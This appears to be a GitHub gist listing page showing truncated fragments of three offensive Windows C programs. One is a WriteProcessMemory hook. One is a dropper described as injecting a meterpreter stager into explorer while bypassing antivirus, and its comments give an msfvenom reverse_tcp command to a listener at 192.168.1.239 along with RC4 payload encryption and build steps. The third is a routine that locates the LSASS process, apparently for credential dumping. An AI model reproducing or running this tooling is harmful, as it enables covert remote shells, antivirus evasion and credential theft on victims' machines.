batsec bats3c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| #define BUFFER_FILE ".\\wpm_buffer.bin" | |
| // definitions | |
| typedef WINBOOL (WINAPI * WriteProcessMemory_) (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); | |
| char OrgWriteProcMem[50] = {}; |
bats3c
/ winapi_dropper.c
Created
August 6, 2020 01:58
Inject a meterpreter stager into explorer while bypassing anti virus
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <wincrypt.h> | |
| #include <tlhelp32.h> | |
| /****************************************************************************************************/ | |
| // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.239 LPORT=4444 -f raw -o meter.bin | |
| // cat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin | |
| // xxd -i encmeter.bin | |
| // x86_64-w64-mingw32-gcc dropper.c -o dropper.exe |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <dbghelp.h> | |
| #include <tlhelp32.h> | |
| DWORD findLsass() | |
| { | |
| HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); | |
| if(hSnapshot) | |
| { |
NewerOlder